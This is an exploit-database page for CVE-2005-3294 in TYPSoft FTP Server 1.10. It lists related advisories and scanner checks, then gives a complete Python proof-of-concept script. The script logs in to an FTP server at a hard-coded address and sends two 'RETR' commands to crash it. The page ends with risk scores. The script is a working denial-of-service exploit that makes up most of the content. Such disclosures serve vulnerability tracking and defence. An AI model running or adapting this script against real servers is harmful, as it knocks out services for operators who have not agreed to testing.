TYPSoft FTP Server 1.10 - 'RETR' Denial of Service (2)

🗓️ 29 Dec 2010 00:00:00Reported by emgentType

TYPSoft FTP Server 1.10 RETR Denial of Service exploit

Reporter	Title	Published	Views	Family All 12
0day.today	TYPSoft FTP Server (v 1.10) RETR CMD Denial Of Service	29 Dec 201000:00	–	zdt
Tenable Nessus	TYPSoft FTP Server Multiple DoS	9 Sep 200400:00	–	nessus
Tenable Nessus	TYPSoft FTP Server <= 1.10 Multiple DoS	14 Oct 200500:00	–	nessus
Circl	CVE-2005-3294	14 May 201000:00	–	circl
CVE	CVE-2005-3294	23 Oct 200504:00	–	cve
Cvelist	CVE-2005-3294	23 Oct 200504:00	–	cvelist
exploitpack	TYPSoft FTP Server 1.10 - RETR Denial of Service (2)	29 Dec 201000:00	–	exploitpack
NVD	CVE-2005-3294	23 Oct 200521:02	–	nvd
OpenVAS	TYPSoft FTP Server RETR CMD Denial Of Service Vulnerability	8 Jan 201100:00	–	openvas
OpenVAS	TYPSoft FTP Server RETR CMD Denial Of Service Vulnerability	8 Jan 201100:00	–	openvas

#!/usr/bin/python
#
# TYPSoft FTP Server (v 1.10) RETR CMD Denial Of Service
#
# CVE-2005-3294
# OSVDB 19992
#
# 12/23/2010
# (C) Emanuele Gentili <[email protected]>
#
# Notes:
# I have wrote this exploit because the code published here (1) do not work correctly.
# (1) http://www.exploit-db.com/exploits/12604/
#

import socket
import sys

user="test"
pwd="test"
buffer="\x41"

print("\n TYPSoft FTP Server (V 1.10) RETR CMD Denial Of Service\n")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.109",21))
data = s.recv(1024)
print("[+] Sending user login...")
s.send("USER " + user + '\r\n')
data = s.recv(1024)
s.send("PASS " + pwd + '\r\n')
data = s.recv(1024)
print("[+] Sending first exploit stage...")
s.send("RETR " + buffer + '\r\n')
data = s.recv(1024)
print("[+] Sending second exploit stage...\n")
s.send("RETR " + buffer + '\r\n')
data = s.recv(1024)
s.close()

29 Dec 2010 00:00Current

6.5Medium risk

Vulners AI Score6.5

CVSS 25

EPSS0.16885

TYPSoft FTP Server 1.10 - &#039;RETR&#039; Denial of Service (2)

TYPSoft FTP Server 1.10 - 'RETR' Denial of Service (2)